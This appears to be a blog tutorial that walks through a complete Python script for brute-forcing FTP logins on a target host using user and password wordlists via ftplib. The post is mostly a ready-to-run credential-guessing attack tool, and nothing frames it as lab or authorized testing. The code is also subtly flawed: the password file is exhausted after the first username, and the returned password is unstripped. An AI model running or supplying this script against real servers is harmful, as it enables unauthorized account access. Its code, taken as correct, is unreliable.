The article will guide you on how to bruteforce FTP using ftplib library in python. I have already posted an article on how to check for anonymous FTP script. FTP is File transfer protocol which is used to upload/download files from server to client. It works on Port 21. FTPLIB provides many features to python to connect and handle FTP connections.
The code is pretty forward. We will import the ftplib library and sys to use arguments
def logfile(target,users,passw): This function works for the user and password files. It opens them and passes them to the function bruteftp.
def bruteftp(target,users,passw): This function takes the input sent by the logfile() function and remove the carriage return and newline from the user and password which came directly from the file using *.strip(‘\r’).strip(‘\n’). Once removed, it passes the new stripped user and password to the ftp.login() to check if they are correct.
#!/usr/bin/python3 import ftplib import sys def logfile(target,users,passw): try: ufile=open(users,'r') pfile=open(passw,'r') for user in ufile.readlines(): for password in pfile.readlines(): bruteftp(target,user,password) except Exception as e: print(e) def bruteftp(target,users,passw): try: ftp=ftplib.FTP(target) user=users.strip('\r').strip('\n') password=passw.strip('\r').strip('\n') print('Trying with: '+user+" "+password) ftp.login(user,password) ftp.quit() print('Login succeeded with: '+user+" "+password) return(user,passw) except Exception as e: print("Incorrect credentials.") return(None,None) if len(sys.argv) !=4: print("Not enough arguments:\n"+\ 'Usage: target userfile passfile') else: host=sys.argv[1] users=sys.argv[2] passw=sys.argv[3] logfile(host,users,passw)